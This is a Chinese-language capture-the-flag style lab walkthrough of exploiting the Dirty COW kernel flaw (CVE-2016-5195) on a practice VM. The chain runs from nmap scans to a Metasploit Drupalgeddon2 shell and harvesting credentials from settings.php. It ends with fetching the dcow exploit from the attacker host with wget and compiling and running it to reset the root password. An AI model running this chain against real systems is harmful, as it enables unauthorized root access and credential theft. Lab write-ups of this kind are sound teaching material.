脏牛提权(靶机复现)

07-21 1665阅读

目录

一、脏牛漏洞概述

二、漏洞复现

1.nmap信息收集

1.1.查看当前IP地址

1.2.扫描当前网段,找出目标机器

1.3.快速扫描目标机全端口

三、访问收集到的资产

192.168.40.134:80

192.168.40.134:1898

四、msf攻击

1.查找对应exp

2.选择对应exp并配置相关设置

五、内网漏洞信息收集

六、漏洞利用

方法一

1.上传漏洞exp进行利用

2.上传exp

3.编译exp并使用python开启一个bash终端

4.执行编译后的exp

5.su登录root账户

方法二

1.通过排查信息,发现网站配置信息

2.ssh连接

3.传入exp并编译执行。


一、脏牛漏洞概述

脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞。Linux kernel团队在2016年10月18日已经对此进行了修复。

漏洞范围

Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复)

漏洞编号

脏牛的CVE编号是CVE-2016-5195。

漏洞危害

低权限用户利用该漏洞技术可以在全版本Linux系统上实现本地提权

漏洞原理

该漏洞具体为,Linux内核的内存子系统在处理写入复制(copy-on-write, COW)时产生了竞争条件(race condition)。

恶意用户可利用此漏洞,来获取高权限,对只读内存映射进行写访问。

竞争条件,指的是任务执行顺序异常,可导致应用崩溃,或令攻击者有机可乘,进一步执行其他代码。

利用这一漏洞,攻击者可在其目标系统提升权限,甚至可能获得root权限。

二、漏洞复现

  • 环境:同一内网下
  • 靶机下载:
      • 链接:百度网盘 请输入提取码
      • 提取码:TBUG

      1.nmap信息收集

      1.1.查看当前IP地址

      ┌──(root㉿tubug)-[~/桌面]
      └─# ifconfig eth0 | grep inet
              inet 192.168.40.130  netmask 255.255.255.0  broadcast 192.168.40.255
              inet6 fe80::20c:29ff:fe88:e3c  prefixlen 64  scopeid 0x20

      脏牛提权(靶机复现)

      1.2.扫描当前网段,找出目标机器

      ┌──(root㉿tubug)-[~/桌面]
      └─# nmap -sP 192.168.40.0/24
      /*
      -s		指定扫描技术
      -P		ping操作
      -sP		使用ping操作来寻找存活主机
      */
      发现目标机为:192.168.40.134

      脏牛提权(靶机复现)

      1.3.快速扫描目标机全端口

      ┌──(root㉿tubug)-[~/桌面]
      └─# nmap -sS -p 1-65535 192.168.40.134
      /*
      -sS	SYN扫描技术
      -p  指定端口
      */

      脏牛提权(靶机复现)

      三、访问收集到的资产

      192.168.40.134:80

      脏牛提权(靶机复现)

      192.168.40.134:1898

      脏牛提权(靶机复现)

      访问发现关键信息网站指纹:Drupal

      四、msf攻击

      1.查找对应exp

      ┌──(root㉿tubug)-[~/桌面]
      └─# msfconsole
      msf6 > search drupal

      脏牛提权(靶机复现)

      2.选择对应exp并配置相关设置

      msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.40.134
      msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rport 1898
      msf6 exploit(unix/webapp/drupal_drupalgeddon2) > run
      meterpreter > getuid
      Server username: www-data
      该exp漏洞属于远程代码执行漏洞
      构造特殊的HTTP请求,将恶意代码注入到网站的表单处理程序中从而执行恶意代码。

      五、内网漏洞信息收集

      📎bug.sh

      meterpreter > upload /root/bug.sh /tmp/1.sh
      meterpreter > shell
      pwd
      		/var/www/html
      cd /tmp/
      pwd
      		/tmp
      ls
      		1.sh
      bash 1.sh

      脏牛提权(靶机复现)

      发现脏牛漏洞,CVE-2016-5195

      六、漏洞利用

      方法一

      1.上传漏洞exp进行利用

      📎dcow.cpp

      2.上传exp

      meterpreter > upload /root/dcow.cpp /tmp/dirtcow.cpp
      meterpreter > shell
      cd /tmp

      3.编译exp并使用python开启一个bash终端

      g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dirtcow.cpp -lutil
      python -c 'import pty; pty.spawn("/bin/bash")'

      4.执行编译后的exp

      www-data@lampiao:/tmp$ ./dcow   
      ./dcow
      Running ...
      Received su prompt (Password: )
      Root password is:   dirtyCowFun
      Enjoy! :-)

      5.su登录root账户

      www-data@lampiao:/tmp$ su root 
      su root 
      Password: dirtyCowFun

      方法二

      1.通过排查信息,发现网站配置信息

      meterpreter > shell
      cd /var/www/html/sites/default/
      cat settings.php

      发现一个账号以及密码

      脏牛提权(靶机复现)

      发现账号不像是正经账号,使用ssh连接提示密码错误,猜测用户名可能另有其人。

      cd /home                                            
      ls   
      	tiago

      进入用户家目录发现一个名位tiago的名称,尝试ssh连接

      2.ssh连接

      发现是一个普通用户

      脏牛提权(靶机复现)

      3.传入exp并编译执行。

      使用http协议传输exp至目标机。

      注:scp命令需root账号密码。

      kali开启网站服务,并将exp存放到网站目录下。使用普通用户下载exp。

      root㉿tubug)-[~/桌面]
      └─# service apache2 start 		
      ┌──(root㉿tubug)-[~]
      └─# ls /var/www/html/dcow.cpp
      					/var/www/html/dcow.cpp
      tiago@lampiao:~$ wget http://192.168.40.130/dcow.cpp

      脏牛提权(靶机复现)

      tiago@lampiao:~$ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil
      tiago@lampiao:~$ ls
      dcow  dcow.cpp
      tiago@lampiao:~$ ./dcow
      Running ...
      Received su prompt (Password: )
      Root password is:   dirtyCowFun
      Enjoy! :-)
      tiago@lampiao:~$ su - root
      Password: 
      root@lampiao:~# id
      uid=0(root) gid=0(root) groups=0(root)
      
VPS购买请点击我

文章版权声明:除非注明,否则均为主机测评原创文章,转载或复制请以超链接形式并注明出处。

目录[+]